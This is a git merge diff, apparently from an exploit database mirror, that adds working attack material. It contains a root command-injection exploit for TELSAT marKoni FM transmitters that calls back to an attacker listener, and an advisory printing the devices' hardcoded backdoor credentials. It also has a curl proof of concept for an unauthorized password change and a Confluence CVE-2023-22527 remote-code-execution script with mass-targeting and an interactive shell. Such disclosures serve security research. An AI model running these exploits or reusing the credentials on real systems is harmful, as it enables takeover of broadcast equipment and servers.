Merge remote-tracking branch 'upstream/main'

exploits/hardware/remote/51906.py

@@ -0,0 +1,193 @@
+#!/usr/bin/env python
+#
+#
+# TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
+#
+#
+# Vendor: TELSAT Srl
+# Product web page: https://www.markoni.it
+# Affected version: Markoni-D (Compact) FM Transmitters
+#                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
+#                   Markoni-A (Analogue Modulator) FM Transmitters
+#                   Firmware: 1.9.5
+#                             1.9.3
+#                             1.5.9
+#                             1.4.6
+#                             1.3.9
+#
+# Summary: Professional FM transmitters.
+#
+# Desc: The marKoni FM transmitters are susceptible to unauthenticated
+# remote code execution with root privileges. An attacker can exploit
+# a command injection vulnerability by manipulating the Email settings'
+# WAN IP info service, which utilizes the 'wget' module. This allows
+# the attacker to gain unauthorized access to the system with administrative
+# privileges by exploiting the 'url' parameter in the HTTP GET request
+# to ekafcgi.fcgi.
+#
+# -------------------------------------------------------------------------
+# [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
+# Authentication successful for backdoor
+# Injecting command: whoami
+# Listening on port 9999
+# ('10.0.8.3', 47302) called back
+# Received: root
+# Housekeeping...
+# Zya and thanks for stopping by!
+#
+# [lqwrm@metalgear ~]#
+#
+# -------------------------------------------------------------------------
+#
+# Tested on: GNU/Linux 3.10.53 (armv7l)
+#            icorem6solox
+#            lighttpd/1.4.33
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2024-5808
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
+#
+#
+# 10.11.2023
+#
+
+from colorama import init, Fore
+import re,os,sys,requests
+import socket,threading
+from time import sleep
+init()
+
+def just_listen_to_me(lport, cstop):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lport))
+    s.listen(1)
+    print("Listening on port " + str(lport))
+    try:
+        conn, addr = s.accept()
+        print(addr, "called back")
+        cstop.set()
+    except socket.timeout:
+        print("Call return timeout\nCheck your ports")
+        conn.close()
+    while True:
+        try:
+            odg = conn.recv(1771).decode()
+            uam = re.search(r"User-Agent:\s*(.*)", odg)
+
+            if uam:
+                uav = uam.group(1)
+                print(f"Received: {uav}")
+                exit()
+            else:
+                print("No output for you")
+        except:
+            print("Housekeeping...")
+            exit()
+    s.close()
+
+def authenticate(ipaddr, option): #### Encrypted Shit ####_"
+    auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
+    ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
+    if option == "user": ##################################"
+        username = "\x75\x73\x65\x72" #####################"
+        password = "\x75\x73\x65\x72" #####################"
+    elif option == "admin": ###############################"
+        username = "\x61\x64\x6D\x69\x6E" #################"
+        password = "\x61\x64\x6D\x69\x6E" #################"
+    elif option == "backdoor": ############################"
+        username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
+        password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
+
+    authp = {
+        'username': username,
+        'password': password
+    }
+
+    resp = requests.get(auth_url + ep + "1", params=authp)
+
+    if "Set-Cookie" in resp.headers:
+        print(f"Authentication successful for {option}")
+        auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
+        return auth_cookie
+    else:
+        print(f"Authentication failed for {option}.")
+        print("Try a different option.")
+        return None
+
+def execute(ipaddr, cookie, command, listen_ip):
+    print(f"Injecting command: {command}")
+    ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
+    eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
+    dva = f"http://{ipaddr}{ep}27"
+    tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
+    clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
+
+    headers = {"Cookie": cookie}
+
+    requests.get(eden, headers=headers)
+    sleep(2)
+    requests.get(dva, headers=headers)
+    sleep(2)
+    requests.get(tri, headers=headers)
+    sleep(1)
+    requests.get(clear, headers=headers)
+    print("Zya and thanks for stopping by!")
+    exit(0)
+
+def njaaah(text):
+    columns = os.get_terminal_size().columns
+    print(text.center(columns))
+
+zsl = "\033[91mWaddup!\033[0m" #Win64
+mrjox = f"""
+     ________
+   /          \\
+  /    ____    \\
+ |   /    0 \\   |
+ |   \\______/   |
+  \\____________/  {zsl}
+       | |
+      /   \\
+     /  O  \\
+    |    O  \\
+    |       \\
+    |        \\
+    |_________|
+        """
+
+if len(sys.argv) != 5:
+    print()
+    print("This is a PoC script for the marKoni transmitters 0day")
+    print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
+    print("Option: 'user', 'admin', 'backdoor'")
+    print("Default listening port: 9999")
+    njaaah(mrjox)
+    exit()
+
+ipaddr = sys.argv[1]
+opt = sys.argv[2]
+listen_ip = sys.argv[3]
+command = sys.argv[4]
+
+opt_map = {
+    "admin"    : "admin",
+    "user"     : "user",
+    "backdoor" : "backdoor"
+}
+
+if opt in opt_map:
+    auth_cookie = authenticate(ipaddr, opt_map[opt])
+    if auth_cookie:
+        cstop = threading.Event()
+        lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
+        lt.start()
+        execute(ipaddr, auth_cookie, command, listen_ip)
+        cstop.set()
+        lt.join()
+else:
+    print("Invalid option.")

exploits/hardware/remote/51907.txt

@@ -0,0 +1,57 @@
+TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account
+
+
+Vendor: TELSAT Srl
+Product web page: https://www.markoni.it
+Affected version: Markoni-D (Compact) FM Transmitters
+                  Markoni-DH (Exciter+Amplifiers) FM Transmitters
+                  Markoni-A (Analogue Modulator) FM Transmitters
+                  Firmware: 1.9.5
+                            1.9.3
+                            1.5.9
+                            1.4.6
+                            1.3.9
+
+Summary: Professional FM transmitters.
+
+Desc: The transmitter has a hidden super administrative account 'factory'
+that has the hardcoded password 'inokram25' that allows full access to
+the web management interface configuration. The factory account is not
+visible in the users page of the application and the password cannot be
+changed through any normal operation of the device. The backdoor lies in
+the /js_files/LogIn_local.js script file. Attackers could exploit this
+vulnerability by logging in using the backdoor credentials for the web
+panel gaining also additional functionalities including: unit configuration,
+parameter modification, EEPROM overwrite, clearing DB, and factory log
+modification.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+           icorem6solox
+           lighttpd/1.4.33
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2024-5809
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php
+CWE ID: 912
+CWE URL: https://cwe.mitre.org/data/definitions/912.html
+
+
+10.11.2023
+
+--
+
+
+The credentials can be seen in the auto_login() JS function in the
+unprotected /js_files/LogIn_local.js file:
+
+$ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()"
+
+function auto_login() {     // @mod1
+    var username = "factory";
+    var password = "inokram25";
+$

exploits/hardware/remote/51908.txt

@@ -0,0 +1,54 @@
+TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
+
+
+Vendor: TELSAT Srl
+Product web page: https://www.markoni.it
+Affected version: Markoni-D (Compact) FM Transmitters
+                  Markoni-DH (Exciter+Amplifiers) FM Transmitters
+                  Markoni-A (Analogue Modulator) FM Transmitters
+                  Firmware: 1.9.5
+                            1.9.3
+                            1.5.9
+                            1.4.6
+                            1.3.9
+
+Summary: Professional FM transmitters.
+
+Desc: Unauthorized user could exploit this vulnerability to change
+his/her password, potentially gaining unauthorized access to sensitive
+information or performing actions beyond her/his designated permissions.
+
+Tested on: GNU/Linux 3.10.53 (armv7l)
+           icorem6solox
+           lighttpd/1.4.33
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2024-5811
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php
+
+
+10.11.2023
+
+--
+
+
+PoC request of a user changing his own password.
+Only admin can edit users. No permissions or Cookie check.
+
+$ curl -s -H "Cookie: name=user-1702119917" \
+http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t
+
+HTTP/1.1 200 OK
+Content-type: text/html
+Cache-control: no-cache
+Set-Cookie: name=user-1702119917; max-age=315360000
+Transfer-Encoding: chunked
+Date: Sat, 9 Dec 2023 11:05:17 GMT
+Server: lighttpd/1.4.33
+
+oc=4&resp=0

exploits/multiple/webapps/51904.py

@@ -0,0 +1,81 @@
+# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
+# Date: 25/1/2024
+# Exploit Author: MaanVader
+# Vendor Homepage: https://www.atlassian.com/software/confluence
+# Software Link: https://www.atlassian.com/software/confluence
+# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
+# Tested on: 8.5.3
+# CVE : CVE-2023-22527
+
+
+
+import requests
+import argparse
+import urllib3
+from prompt_toolkit import PromptSession
+from prompt_toolkit.formatted_text import HTML
+from rich.console import Console
+
+# Disable SSL warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Argument parsing
+parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
+parser.add_argument("-u", "--url", help="Single Confluence Server URL")
+parser.add_argument("-f", "--file", help="File containing list of IP addresses")
+parser.add_argument("-c", "--command", help="Command to Execute")
+parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
+args = parser.parse_args()
+
+# Rich console for formatted output
+console = Console()
+
+# Function to send payload
+def send_payload(url, command):
+    headers = {
+        'Connection': 'close',
+        'Content-Type': 'application/x-www-form-urlencoded'
+    }
+    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
+                      '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
+    headers['Content-Length'] = str(len(payload))
+
+    full_url = f"{url}/template/aui/text-inline.vm"
+    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
+    return response.text.split('<!DOCTYPE html>')[0].strip()
+
+# Interactive shell function
+def interactive_shell(url):
+    session = PromptSession()
+    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
+    while True:
+        try:
+            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
+            if cmd.lower() in ["exit", "quit"]:
+                break
+            response = send_payload(url, cmd)
+            console.print(response)
+        except KeyboardInterrupt:
+            break
+        except Exception as e:
+            console.print(f"[bold red]Error: {e}[/bold red]")
+            break
+
+# Process file function
+def process_file(file_path):
+    with open(file_path, 'r') as file:
+        for line in file:
+            ip = line.strip()
+            url = f"http://{ip}:8090"
+            console.print(f"Processing {url}")
+            print(send_payload(url, args.command))
+
+# Main execution logic
+if args.shell and args.url:
+    interactive_shell(args.url)
+elif args.url and args.command:
+    print(send_payload(args.url, args.command))
+elif args.file and args.command:
+    process_file(args.file)
+else:
+    print("Error: Please provide a valid URL and a command or use the interactive shell option.")